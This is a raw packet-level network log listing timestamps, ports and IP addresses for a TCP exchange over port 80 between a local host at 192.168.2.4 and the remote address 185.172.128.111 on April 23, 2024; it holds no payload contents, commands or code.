Apr 23, 2024 09:27:06.463507891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463514090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.463548899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463562012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.463593006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.463738918 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463776112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463788033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.463813066 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463824034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.463845968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.463860989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.463886023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464034081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464083910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464086056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464137077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464158058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464169025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464175940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464211941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464431047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464467049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464489937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464502096 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464509010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464534998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464550018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464587927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464693069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464732885 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464745045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464768887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464781046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464802027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.464811087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.464849949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.465411901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.465447903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.465476990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.465482950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.465500116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.465514898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.465523005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.465559959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.509113073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.509150982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.509187937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.509207964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.509207964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.509293079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.509301901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.509337902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.509350061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.509375095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.509393930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.509412050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.509418011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.509464979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.509476900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.509515047 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.509516001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.509552956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.509577036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.509589911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.509599924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.509632111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.513978958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.514102936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562182903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562223911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562258959 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562294006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562330008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562364101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562398911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562436104 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562470913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562505007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562539101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562551975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562552929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562552929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562552929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562552929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562552929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562552929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562552929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562576056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562612057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562632084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562632084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562648058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562664032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562685966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562705040 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562724113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562742949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562761068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562791109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562813044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562834024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562871933 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.562925100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.562925100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.563004017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.563040018 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.563049078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.563107014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.563119888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.563143015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.563149929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.563185930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.566581011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.566751003 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614408970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614470005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614509106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614548922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614584923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614624023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614660025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614696026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614733934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614764929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614769936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614764929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614764929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614764929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614764929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614765882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614765882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614765882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614846945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614871979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614846945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614914894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614919901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614952087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614959002 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.614990950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.614995956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615027905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615031958 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615066051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615082026 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615114927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615175962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615215063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615286112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615324974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615354061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615354061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615354061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615423918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615545988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615585089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615622997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615659952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615724087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615724087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615724087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615724087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615787983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615853071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615854979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615906954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.615923882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615961075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.615977049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.616008997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.616360903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.616399050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.616435051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.616471052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.616554976 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.616568089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.616606951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.616635084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.616642952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.616657972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.616681099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.616698027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.616739988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.616934061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.616986990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.617007971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.617062092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.617083073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.617122889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.617144108 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.617166042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.617312908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.617351055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.617372036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.617388010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.617397070 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.617425919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.617439032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.617475033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.617710114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.617748976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.617765903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.617785931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.617804050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.617824078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.617835045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.617876053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.618114948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.618158102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.618180037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.618196011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.618206024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.618232965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.618252039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.618289948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.619776964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.619837999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.667455912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.667500019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.667537928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.667574883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.667629004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.667664051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.667673111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.667673111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.667673111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.667673111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.667673111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.667704105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.667756081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.667756081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.667756081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.667795897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.667814016 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.667840004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.667876005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.667975903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.668011904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.668047905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.668083906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.668129921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.668129921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.668129921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.668129921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.668129921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.668158054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.668227911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.668416023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.668452024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.668471098 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.668489933 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.668494940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.668526888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.668536901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.668579102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.668821096 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.668859005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.668875933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.668901920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669018984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669055939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669075966 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669090986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669095039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669128895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669140100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669164896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669178009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669204950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669231892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669253111 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669334888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669373989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669394016 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669409037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669411898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669445992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669473886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669498920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669579029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669615030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669636965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669650078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669656038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669686079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669694901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669742107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.669943094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669980049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.669997931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.670016050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.670022011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.670052052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.670063972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.670103073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.670244932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.670280933 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.670299053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.670326948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.670360088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.670399904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.670414925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.670454025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.671042919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.671086073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.671104908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.671123981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.671129942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.671168089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.671181917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.671221018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.672465086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.672521114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.715264082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.715312004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.715328932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.715348959 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.715361118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.715384007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.715389013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.715425014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.715425014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.715461016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.715461016 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.715497017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.715497017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.715537071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.715537071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.715572119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:06.715573072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.715609074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:06.715610027 CEST	49730	80	192.168.2.4	185.172.128.111
